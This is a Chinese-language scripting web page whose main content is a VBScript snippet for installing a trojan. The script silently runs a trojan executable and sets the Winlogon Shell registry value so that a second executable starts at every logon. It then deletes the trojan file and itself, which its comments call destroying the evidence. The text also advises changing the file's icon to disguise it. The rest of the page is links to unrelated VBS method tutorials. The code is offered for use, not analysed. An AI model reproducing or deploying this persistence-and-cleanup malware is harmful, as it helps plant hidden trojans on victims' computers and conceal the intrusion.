vbs 注册表实现木马自启动

所属分类: 脚本专栏 / vbs 阅读数: 1325
收藏 0 赞 0 分享
呵呵~不过别人一般没这个闲工夫检查那么多位置的!就连我也做不到~~
复制代码 代码如下:

dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //运行木马程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//写进注册表项实现自启动
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木马的执行完毕
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毁尸灭迹
再修改下图标就大功告成了!
更多精彩内容其他人还在看

VBS教程:方法-GetParentFolderName 方法

vbs GetParentFolderName用来获取指定的路径中最后一个文件或文件夹的父文件夹
收藏 0 赞 0 分享

VBS教程:方法-GetFolder 方法

VBS教程:方法-GetFolder 方法
收藏 0 赞 0 分享

VBS教程:方法-GetFileName 方法

VBS教程:方法-GetFileName 方法
收藏 0 赞 0 分享

VBS教程:方法-GetFile 方法

VBS教程:方法-GetFile 方法
收藏 0 赞 0 分享

VBS教程:方法-GetExtensionName 方法

VBS教程:方法-GetExtensionName 方法
收藏 0 赞 0 分享

VBS教程:方法-GetDriveName 方法

VBS教程:方法-GetDriveName 方法
收藏 0 赞 0 分享

VBS教程:方法-GetDrive 方法

VBS教程:方法-GetDrive 方法
收藏 0 赞 0 分享

VBS教程:方法-GetBaseName 方法

VBS教程:方法-GetBaseName 方法
收藏 0 赞 0 分享

VBS教程:方法-GetAbsolutePathName 方法

VBS教程:方法-GetAbsolutePathName 方法
收藏 0 赞 0 分享

VBS教程:方法-FolderExists 方法

VBS教程:方法-FolderExists 方法
收藏 0 赞 0 分享
查看更多